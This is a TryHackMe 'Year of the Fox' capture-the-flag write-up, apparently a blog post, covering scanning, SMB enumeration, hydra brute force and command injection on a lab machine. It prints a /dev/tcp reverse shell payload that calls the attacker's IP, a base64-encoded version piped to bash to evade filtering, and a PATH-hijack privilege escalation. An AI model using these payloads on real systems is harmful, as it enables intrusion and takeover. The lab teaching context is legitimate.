Dec 19, 2021
Year of the Fox [Tryhackme]
Don’t underestimate the sly old fox || TryHackMe writeup
✔️ Information gathering :
Rustscan :
┌──(root💀kali)-[~]
└─# rustscan -a 10.10.75.135 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.75.135:80
Open 10.10.75.135:139
Open 10.10.75.135:445
seems like a window machine, because 445(smb) server is there , mostly smb server runs on windows machine. though it can be run on linux also, but mostly we found port 445 open on windows machine.
NMAP :
┌──(root💀kali)-[~]
└─# nmap -sC -sV 10.10.75.135 -p 139,445,80
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-05 02:15 EST
Nmap scan report for 10.10.75.135
Host is up (0.31s latency).PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=You want in? Gotta guess the password!
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOXHost script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 2s
|_nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: year-of-the-fox
| NetBIOS computer name: YEAR-OF-THE-FOX\x00
| Domain name: lan
| FQDN: year-of-the-fox.lan
|_ System time: 2021-12-05T07:15:58+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-05T07:15:58
|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds
lets enumerate SMB server first
SMBCLIENT :
┌──(root💀kali)-[~]
└─# smbclient -L 10.10.75.135
Enter WORKGROUP\root's password: Sharename Type Comment
--------- ---- -------
yotf Disk Fox's Stuff -- keep out!
IPC$ IPC IPC Service (year-of-the-fox server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
it asked for workgroup password , and the password was blank , just mare guess.
we have a share called yotf
lets try to login to smb server :
┌──(root💀kali)-[~]
└─# smbclient -U 'guest' \\\\10.10.75.135\\yotf
Enter WORKGROUP\guest's password:
tree connect failed: NT_STATUS_ACCESS_DENIEDwe got some error message !! , not able to login !!
lets try to enumerate port 80
PORT 80 : webserver
it is asking some kind of username and password . i guess they are using basic authentication !!
GET / HTTP/1.1
Host: 10.10.75.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46cGFzc3dvcmQ=i belive we need to guess the username and password , for that lets start again with SMB .
i will use enum4linux
enum4linux :
S-1-5-21-978893743-2663913856-222388731-1049 *unknown*\*unknown* (8)
S-1-5-21-978893743-2663913856-222388731-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\fox (Local User)
S-1-22-1-1001 Unix User\rascal (Local User)
possible username :
- fox
- rascal
we will try to brute force the password with web request , though we can bruteforce it agains the smb only with help of crackmapexec , but just we can do this with web request , i will be using hydra
Hydra :
┌──(root💀kali)-[~]
└─# hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.75.135 http-get -t 64
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-05 04:19:19
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.75.135:80/
[80][http-get] host: 10.10.75.135 login: rascal password: underground
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-05 04:20:19
Copy
username : rascal
password : underground
now, lets try to login to web site
after typing something random , it did’nt return anything!!
i also tried ‘../’ but javascript blocked the charater i think
then i type random one letter and i got some files.
then i type . in the search ,and i got this :
i belive lets try to access this files form the / root of web , but there was nothing.
i am confuse at this stage, i have also run web directory bruteforcing , but did'nt get some usefull outcome.
┌──(root💀kali)-[~]
└─# dirsearch -u http://10.10.75.135 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 200 _|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 200 | Wordlist size: 20475Output File: /root/.dirsearch/reports/10.10.75.135/_21-12-05_05-24-11.txtError Log: /root/.dirsearch/logs/errors-21-12-05_05-24-11.logTarget: http://10.10.75.135/[05:24:12] Starting:
[05:25:36] 403 - 277B - /server-status
Task Completed
i was clueless , at this moment i have tried all the things i can think of .
then finally i have to look for online writeup and i found that there was command injection vuln .
i tried to run dictionary attack with special char file.
i wasnt able to discover the payload , even after running intruder attack using commong command injection payload wordlist.
now after looking up for online write up i found that these payload were working :
(these payload should be kept inside of double quote of the value of jason format)
\";pwd \"
\";pwd\n✔️ exploitation [initial foothold]
now i tried to run the follwing payload :
\";sh -i >& /dev/tcp/10.17.9.224/9001 0>&1\nand set up my listner on port 9001
nc -lvnp 9001but i did’nt worked , then i tried again with another payload , but this time also it did’nt worked.
then i belive there is server side blocking on specific string.
ok now lets try to encode our payload using base64
we can do that using , base64 command , but due to come special charater in the strings i will use cyber chef , so that i get correct base64 encoded string.
now we need to do some modification to our payload like so :
\";echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTcuOS4yMjQvOTAwMSAwPiYx|base64 -d |bash\noverall body of the request is like so :
{
"target":"\";echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTcuOS4yMjQvOTAwMSAwPiYx|base64 -d |bash\n"
}and now we got the connection :
stabilizing the shell :
getting web flag :
✔️ post exploitation :
i done some manual scanning ,but was not able to find some thing great so i run linpeas.sh
now first lets change our path to /dev/shm
changing its permision chmod +x linpeas.sh and lets run it .
port 22 (ssh) running locally
we get port 22 running locally :
lets look at the configuration file found in /etc/ssh/sshd_config
we see that fox user is allowed to connect .
now we need to forward this locally running port , so that we can take advantage of it i think we would need to bruteforce it , we can either use chisel or socat to forward the port .
i will be utilizing the socat .
i found that socat is not installed on the machine , we have to dowload it from our attacking machine using python http.server. (make sure that you are downloading it in /dev/shm or /tmp)
now the command to port forward uisng socat is :
./socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22here it will open another port (in this case 8888) and this port will pass trafic to locally running ssh port (we can think that for outsider , port 8888 is the ssh port)
we can check out this will nmap if port 8888 is open on target or not .
as you can see now port 8888 is open
lets run bruteforce attack on it using username fox
and you can see , it just found the password with in 10 sec .
now let try to ssh into the machine .
now we got into the system lets first get the user flag. (user-flag.txt)
✔️ privilege escalation
as first i always run the sudo -l to see is there anything i can run as sudo
and at first i found this :
ok seems like we can run this sudo . but but but …… there is one more error in the above image , as you can see , that there is no secure path define near env_reset,mail_badpass , which is quick doubtefull that there is something do with path exploitation.
when there is secure path define (which is in sudoers file) then , while running the command as root with follow that path , but this machine doesnt have that . so i have doubt on shutdown binary.
let me download this on my kali and analyze it with redare2
you can see form the image , that this binary(shutdown) call another binary called poweroff without absolute path . thus giving us path injection vector for previlege escalation.
ok so now we will copy /bin/bash and rename that to poweroff and manupulate the PATH variable to first look in /tmp so , that it will execute poweroff , which is actually bash binary , so that we get shell will elevated privleges.
and see what we have :
interesting part :
so we can find it like so :
find / -name root.txt -type f 2>/dev/null
but it did’nt work , after 2–3 attampt when i run this
find / -name *root -type f 2>/dev/null
i got this :
This was quite hard and unique challenge !!!!
writeups i have used to this are :
https://tryhackme.com/resources/blog/year-of-the-fox-official-write-up
https://h0j3n.medium.com/tryhackme-year-of-the-fox-631c7752fab2
THANK YOU FOR READING MY WRITE UP !! 👊👊
please support me by following me on medium : https://surya-dev.medium.com/
you guys can subscribe me 🙌on YouTube : i post walkthrough and other ethical hacking related videos there.
